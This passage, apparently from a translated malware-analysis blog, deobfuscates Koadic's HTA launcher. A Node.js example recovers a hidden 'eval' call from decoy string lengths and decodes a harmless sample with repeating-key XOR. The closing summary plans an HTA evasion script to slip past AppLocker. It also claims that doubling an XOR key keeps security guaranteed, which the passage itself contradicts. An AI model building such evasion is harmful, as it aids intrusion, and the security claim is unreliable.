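To make the steps above concrete, here is an added example (plain JavaScript for Node.js, not Koadic's code and not from the original post) that reproduces the deobfuscation an analyst would do on a captured HTA: it recovers the hidden method name from the lengths of the four decoy strings, and reimplements the XOR routine with readable names. The decoy strings and the key literal are the ones from the HTA above; the hex payload is a short constructed sample that decodes to a harmless string, since the post's real payload is not reproduced here.

```javascript
// Added example, not Koadic's code and not from the original post: reproduces the
// deobfuscation steps worked through above in plain JavaScript (runs under Node.js).

// The four decoy strings from the HTA above. Their content is never used; only
// their lengths (101, 118, 97, 108) matter, and each length is a character code.
const decoyStrings = [
  "xGiUpcNKgRznTmrzmwTxXUTIcKeVaTKlLdqoYXUZjSXBqHqekssmTNvXiaKJkjyCHryIvJwJxLwncWQhnEFVNuUQiNbExxNoVxonC",
  "EYVnHFoyIMMyNBKPNOygbgTQbtinuAqeAMOzURnXfBkJxlFMWVJUIUaiqHbIPLLhkKMWJXRiVOYBibfrPoXVOkTTnEmRWbclNJsmzWppJFWJgQSdctdPVK",
  "vZmEJAmYdbGdBhZwvxoVAiyKgRkPHtWkqSlMIrTgsVIxKbEaSgJEAnDNHZiJVvajHgWPTcJcJRcQwveoElsCObfVfOSBvAHld",
  "ADNuJzwGEEzQIvYwjSCKNcJhIiHyjnguXOjxFLCPVXuONOUtylGabwSPkwMJobTfIUsZWeRKBEkIUQIiFBflWsfcUhuJikZibKHuqWHIYFIp",
];

// Step 1: turn each decoy's length into a character and join them. With the
// strings above this yields "eval", the function the script looks up via this[...].
function recoverHiddenName(strings) {
  return strings.map((s) => String.fromCharCode(s.length)).join("");
}

// Step 2a: the original's while loop. The key is doubled until it is at least as
// long as the payload. The comparison is against the hex string, so the key ends
// up at least twice as long as the decoded output.
function repeatKey(key, targetLength) {
  let k = key;
  while (k.length < targetLength) k += k;
  return k;
}

// Step 2b: the original's for loop with readable names. Each pair of hex digits is
// one ciphertext byte; byte i/2 is XORed with character i/2 of the repeated key.
function xorHexDecode(hexPayload, key) {
  const k = repeatKey(key, hexPayload.length);
  let out = "";
  for (let i = 0; i < hexPayload.length; i += 2) {
    out += String.fromCharCode(parseInt(hexPayload.substr(i, 2), 16) ^ k.charCodeAt(i / 2));
  }
  return out;
}

// The key literal from the HTA above. The payload hex is a constructed 22-byte
// sample (the post's real payload is not reproduced); it decodes to a harmless
// string and is longer than the 18-character key, so the key-doubling path runs.
const keyFromHta = "6u2IZ64ql0GaOVGPp2";
const constructedHexPayload = "40144069221609514b53280f3c223525134653111572";

// What an analyst wants from a captured sample: which function is called, and
// what text is handed to it. Nothing is executed.
function analyseHta(strings, hexPayload, key) {
  return {
    hiddenCall: recoverHiddenName(strings),
    decodedArgument: xorHexDecode(hexPayload, key),
  };
}

console.log(analyseHta(decoyStrings, constructedHexPayload, keyFromHta));
```

Because the key sits in the script right next to the ciphertext, the payload can be decoded offline like this without ever running the HTA. Doubling the key until it covers the payload makes this a repeating-key XOR, not a one-time pad: the same 18 key characters are reused every 18 bytes, so the scheme is obfuscation against signature matching rather than encryption.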

How koadic's mshta works

It uses eval to execute a string as code; that string is XOR-encrypted shellcode, and param2 is the XOR key.

Summary

  1. With XOR encryption, the key can be grown by self-concatenation up to the length of the plaintext, so there is no need to define a very long key and security is still guaranteed.
  2. The koadic HTA script uses JScript with XOR-encrypted shellcode, and its evasion is decent.
  3. Next, using the method learned here, we write our own evasion JS and turn it into an HTA, so one line is enough to get a session past AppLocker.